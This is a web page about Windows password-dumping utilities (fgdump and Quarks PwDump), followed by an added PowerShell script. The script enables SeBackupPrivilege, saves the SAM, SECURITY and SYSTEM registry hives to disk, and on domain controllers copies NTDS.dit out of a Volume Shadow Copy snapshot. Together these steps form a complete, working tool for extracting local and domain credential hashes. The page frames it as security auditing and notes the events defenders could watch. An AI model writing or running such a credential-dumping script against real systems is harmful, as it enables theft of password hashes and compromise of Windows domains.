Pwdump Windows


fgdump - A utility for dumping passwords on Windows NT/2000/XP/2003 machines. Written by fizzgig (fizzgig@foofus.net).

Greets to all my fellow Foofites: j0m0-Kun (who is the inspiration for this program), phenfen, omi, fade, pmonkey, grunch, rockdon, reefman and of course our namesake foofus. Many thanks to the awesome folks who created cachedump and pwdump3e as well!

More information:

fgdump was born out of frustration with current antivirus (AV) vendors who only partially handled execution of programs like pwdump. Certain vendors' solutions would sometimes allow pwdump to run, sometimes not, and sometimes lock up the box.


As such, we as security engineers had to remember to shut off antivirus before running pwdump and similar utilities like cachedump. Needless to say, we're forgetful sometimes. So fgdump started as simply a wrapper around the things we had to do to make pwdump work effectively. Later, cachedump was added to the mix, as was handling for a couple of other AV variations. Over time it has grown, and continues to grow, to support our assessments and other projects. We are beginning to use it extensively within Windows domains for broad password auditing, and in conjunction with other tools (ownr and pwdumpToMatrix.pl) for discovering implied trust relationships.

fgdump is targeted at the security auditing community, and is designed to be used for good, not evil. :) Note that, in order to use fgdump effectively, you're going to need high-power credentials (Administrator or Domain Administrator, in most cases), thus limiting its usefulness as a hacking tool.

Quarks PwDump is a new open source tool to dump various types of Windows credentials: local accounts, domain accounts, cached domain credentials and BitLocker. The tool is currently designed to work live on the operating system, which limits the risk of undermining its integrity or stability.

Case #1: Domain account hashes are extracted offline from NTDS.dit

It is not currently a full offline dump, because Quarks PwDump is dynamically linked against ESENT.dll (the library that parses JET databases), and that DLL differs between Windows versions. For example, it is not possible to parse a Windows 2008 NTDS.dit file from XP: the record checksums are computed differently, so the database file appears corrupted to the API functions. That is currently the main drawback of the tool: everything has to be done on the domain controller.


However, no code injection or service installation is performed, and the NTDS.dit file (which lsass keeps open on a running DC) can be copied safely by using Microsoft VSS (Volume Shadow Copy Service) to snapshot the volume and reading the file from the snapshot.

Case #3: Local accounts and cached domain credentials

There is nothing really new here; a lot of tools already dump them without any problems.


However, we have chosen an uncommon way to dump them, which only a few tools use. Hashes are extracted live from the SAM and SECURITY hives in a proper way, without code injection or a service. We use the native registry API, specifically the RegSaveKey and RegLoadKey functions, which require the SeBackup and SeRestore privileges (SeBackupPrivilege is enough to save a hive to disk; loading a saved hive back with RegLoadKey additionally needs SeRestorePrivilege).
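As an added example (my own script, not Quarks PwDump's code), the following PowerShell shows both techniques from Case #1 and Case #3 above: it enables SeBackupPrivilege on its own token, opens HKLM\SAM, HKLM\SECURITY and HKLM\SYSTEM in backup mode and writes them out with RegSaveKeyEx, then, when run on a domain controller, creates a VSS snapshot through the Win32_ShadowCopy WMI class and copies NTDS.dit out of it. The output directory C:\hivedump, opening the keys with RegCreateKeyEx and REG_OPTION_BACKUP_RESTORE, and reading the database path from the NTDS service parameters are my assumptions, not something the page describes. Run it from an elevated PowerShell; on a member machine only the hive part applies.

```powershell
# Added example (not Quarks PwDump's code). Output directory is an assumption.
$OutDir = 'C:\hivedump'
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

# Minimal P/Invoke surface: token privilege adjustment plus the registry save API.
Add-Type -Namespace Win32 -Name Native -MemberDefinition @'
[StructLayout(LayoutKind.Sequential)]
public struct LUID { public uint LowPart; public int HighPart; }
[StructLayout(LayoutKind.Sequential)]
public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }
public static readonly UIntPtr HKEY_LOCAL_MACHINE = new UIntPtr(0x80000002u);
[DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool OpenProcessToken(IntPtr h, uint access, out IntPtr token);
[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
public static extern bool LookupPrivilegeValue(string system, string name, out LUID luid);
[DllImport("advapi32.dll", SetLastError=true)]
public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES state, uint len, IntPtr prev, IntPtr retLen);
[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
public static extern int RegCreateKeyEx(UIntPtr hKey, string subKey, uint reserved, string cls, uint options, uint sam, IntPtr secAttr, out UIntPtr result, out uint disposition);
[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
public static extern int RegSaveKeyEx(UIntPtr hKey, string file, IntPtr secAttr, uint flags);
[DllImport("advapi32.dll")] public static extern int RegCloseKey(UIntPtr hKey);
'@

function Enable-Privilege([string]$Name) {
    $tok = [IntPtr]::Zero
    # TOKEN_ADJUST_PRIVILEGES (0x20) | TOKEN_QUERY (0x8)
    if (-not [Win32.Native]::OpenProcessToken([Win32.Native]::GetCurrentProcess(), 0x28, [ref]$tok)) {
        throw 'OpenProcessToken failed'
    }
    $luid = New-Object 'Win32.Native+LUID'
    if (-not [Win32.Native]::LookupPrivilegeValue($null, $Name, [ref]$luid)) { throw "unknown privilege $Name" }
    $tp = New-Object 'Win32.Native+TOKEN_PRIVILEGES'
    $tp.PrivilegeCount = 1; $tp.Luid = $luid; $tp.Attributes = 0x2   # SE_PRIVILEGE_ENABLED
    $ok = [Win32.Native]::AdjustTokenPrivileges($tok, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)
    $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    # AdjustTokenPrivileges returns TRUE even when the token does not hold the privilege;
    # the real signal is ERROR_NOT_ALL_ASSIGNED (1300), which is what a non-elevated shell gets.
    if (-not $ok -or $err -eq 1300) { throw "$Name is not held by this token; run elevated" }
}

function Save-Hive([string]$SubKey, [string]$File) {
    $hk = [UIntPtr]::Zero; $disp = [uint32]0
    # REG_OPTION_BACKUP_RESTORE (0x4): with SeBackupPrivilege enabled the key is opened for
    # reading regardless of its ACL (Administrators cannot read HKLM\SAM or \SECURITY otherwise).
    $rc = [Win32.Native]::RegCreateKeyEx([Win32.Native]::HKEY_LOCAL_MACHINE, $SubKey, 0, $null,
                                         0x4, 0x20019, [IntPtr]::Zero, [ref]$hk, [ref]$disp)
    if ($rc -ne 0) { throw "RegCreateKeyEx($SubKey) failed: $rc" }
    try {
        # Disposition 2 = REG_OPENED_EXISTING_KEY; anything else means we just created a key by mistake.
        if ($disp -ne 2) { throw "HKLM\$SubKey did not exist" }
        if (Test-Path $File) { Remove-Item $File }          # RegSaveKeyEx refuses to overwrite
        $rc = [Win32.Native]::RegSaveKeyEx($hk, $File, [IntPtr]::Zero, 2)   # 2 = REG_LATEST_FORMAT
        if ($rc -ne 0) { throw "RegSaveKeyEx($SubKey) failed: $rc" }
    } finally { [void][Win32.Native]::RegCloseKey($hk) }
}

function Copy-FromShadow([string]$Volume, [string]$RelativePath, [string]$Dest) {
    $r = (Get-WmiObject -List Win32_ShadowCopy).Create($Volume, 'ClientAccessible')
    if ($r.ReturnValue -ne 0) { throw "Win32_ShadowCopy.Create failed: $($r.ReturnValue)" }
    $sc = Get-WmiObject Win32_ShadowCopy -Filter "ID='$($r.ShadowID)'"
    try {
        # DeviceObject is \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN; cmd's copy takes that prefix as-is,
        # and the snapshot is not subject to the sharing lock lsass holds on the live file.
        cmd.exe /c copy /y "$($sc.DeviceObject)$RelativePath" "$Dest" | Out-Null
        if ($LASTEXITCODE -ne 0) { throw "copy from snapshot failed ($LASTEXITCODE)" }
    } finally { [void]$sc.Delete() }   # do not leave the snapshot behind
}

# Case #3: SAM and SECURITY, plus SYSTEM, which holds the boot key needed to decrypt them offline.
Enable-Privilege 'SeBackupPrivilege'
foreach ($h in 'SAM', 'SECURITY', 'SYSTEM') { Save-Hive $h (Join-Path $OutDir "$h.hive") }

# Case #1 (domain controllers only): the database path lives in the NTDS service parameters.
$ntdsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
if (Test-Path $ntdsKey) {
    $ntds = (Get-ItemProperty $ntdsKey).'DSA Database file'          # e.g. C:\Windows\NTDS\ntds.dit
    Copy-FromShadow -Volume $ntds.Substring(0, 3) -RelativePath $ntds.Substring(2) -Dest $OutDir
}
```

The saved files are ordinary hive files, so they can be loaded back with RegLoadKey (which is where SeRestorePrivilege comes in) or parsed offline. Nothing here injects into lsass or installs a service, which is exactly the property the text above claims for this approach; the cost is that the operation is fully visible as a privileged token adjustment and a shadow-copy creation, so defenders watching for those events will see it.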
